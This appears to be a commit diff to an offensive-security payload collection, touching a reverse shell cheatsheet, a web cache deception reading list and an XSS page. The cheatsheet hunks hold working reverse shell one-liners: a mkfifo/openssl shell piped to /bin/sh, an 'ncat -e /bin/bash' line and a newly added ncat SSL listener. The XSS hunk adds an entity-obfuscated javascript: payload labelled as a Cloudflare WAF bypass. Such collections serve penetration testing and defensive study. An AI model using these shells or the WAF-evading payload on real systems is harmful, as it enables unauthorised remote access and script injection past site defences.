Web cache deception resources update

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -102,6 +102,8 @@ ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```powershell
 hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
 hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
+or
+hacker@kali$ ncat --ssl -vv -l -p 4242
 
 user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
 ```
@@ -204,12 +206,10 @@ Access shortcuts, su, nano and autocomplete in a partially tty shell
 /!\ OhMyZSH might break this trick, a simple `sh` is recommended
 
 ```powershell
-# in host
 ctrl+z
+echo $TERM && tput lines && tput cols
 stty raw -echo
 fg
-
-# in reverse shell
 reset
 export SHELL=bash
 export TERM=xterm-256color

Web cache deception/README.md

@@ -55,3 +55,4 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
 * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
 * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
 * [Web Caching - SI9INT](https://si9int.sh/article/6)
+* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)

XSS injection/README.md

@@ -817,6 +817,12 @@ Works for CSP like `script-src self`
 
 ## Common WAF Bypass
 
+### Cloudflare XSS Bypass - 27th february 2018
+
+```html
+<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
+```
+
 ### Chrome Auditor - 9th august 2018
 
 ```javascript